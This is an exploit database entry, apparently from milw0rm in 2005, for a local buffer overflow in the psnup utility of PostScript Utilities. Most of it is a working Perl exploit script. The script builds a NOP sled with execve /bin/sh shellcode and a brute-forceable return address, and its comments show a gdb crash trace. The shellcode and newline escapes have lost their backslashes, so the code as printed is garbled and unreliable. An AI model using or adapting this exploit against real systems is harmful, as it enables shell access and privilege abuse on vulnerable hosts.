PostScript Utilities – ‘psnup’ Local Buffer Overflow
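Vulnerability ID | 1054973 | Vulnerability type | |
Published | 2005-03-21 | Updated | 2005-03-21 |
CVE ID | N/A |
CNNVD-ID | N/A |
Platform | Linux | CVSS score | N/A |
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit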
#!/usr/bin/perl
# PostScript Utilities - psnup (all the utilities of the package are vulnerable) *
# *
# written by lammat just for practice purposes *
# tested against psutils-p17 *
# (gdb) r -8 `perl -e 'print "A"x250'` *
# The program being debugged has been started already. *
# Start it from the beginning? (y or n) y *
# Starting program: /usr/bin/psnup -8 `perl -e 'print "A"x250'` *
# (no debugging symbols found).../usr/bin/psnup: can't open input file *
# AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... *
# *
# Program received signal SIGSEGV, Segmentation fault. *
# 0x41414141 in ?? () *
# execve(/bin/sh) for linux x86
# 29 bytes
# by Matias Sedalo
$shellcode =
"x31xdbx53x8dx43x17xcdx80x99x68x6ex2fx73x68x68".
"x2fx2fx62x69x89xe3x50x53x89xe1xb0x0bxcdx80";
$len = 250;
$ret = 0xbffff3a0;
$nop = "x90";
$oops="/usr/bin/psnup";
$offset = 900;
# offset bruteforce purposes below
if (@ARGV == 1) {
    $offset = $ARGV[0];
}
for ($i=0; $i<($len-length($shellcode)-100);$i++)
{
    $buffer .= $nop;
}
$buffer .= $shellcode;
print ("Address: 0x",sprintf('%lx',($ret + $offset)),"n");
$new_ret = pack('l',($ret + $offset));
until(length($buffer)==$len)
{
    $buffer.=$new_ret;
}
exec("$oops -8 $buffer");
# milw0rm.com [2005-03-21]